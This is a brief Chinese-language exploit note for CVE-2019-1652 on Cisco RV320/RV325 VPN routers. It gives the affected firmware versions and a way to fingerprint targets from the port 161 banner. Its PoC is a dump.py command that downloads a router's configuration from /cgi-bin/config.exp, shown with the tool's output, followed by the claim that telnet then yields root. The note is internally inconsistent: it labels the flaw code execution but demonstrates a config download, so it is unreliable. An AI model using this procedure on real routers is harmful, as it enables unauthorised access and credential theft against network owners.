CVE-2019-1652

漏洞类型

Execute Code

产品名称

Cisco RV320 Dual Gigabit WAN VPN 路由器

Cisco RV325 Dual Gigabit WAN VPN 路由器

影响版本

Cisco RV320 Dual Gigabit WAN VPN Router, 1.4.2.15~1.4.2.20

Cisco RV325 Dual Gigabit WAN VPN Router, 1.4.2.15~1.4.2.20

指纹

从161端口返回的banner信息中获取该路由器的型号和版本信息: Linux, Cisco Small Business RV320 , Version 1.4.2.17 。

png

POC

  1. 可下载config文件

python dump.py -t x.x.x.x -p 8443 -s -d output
{+} Sending request to https://x.x.x.x:8443/cgi-bin/config.exp
{*} We seem to have found a valid config! Writing to output/x.x.x.x_8443.conf

png

  1. 连接

png

成功执行后可telnet连接,获取root权限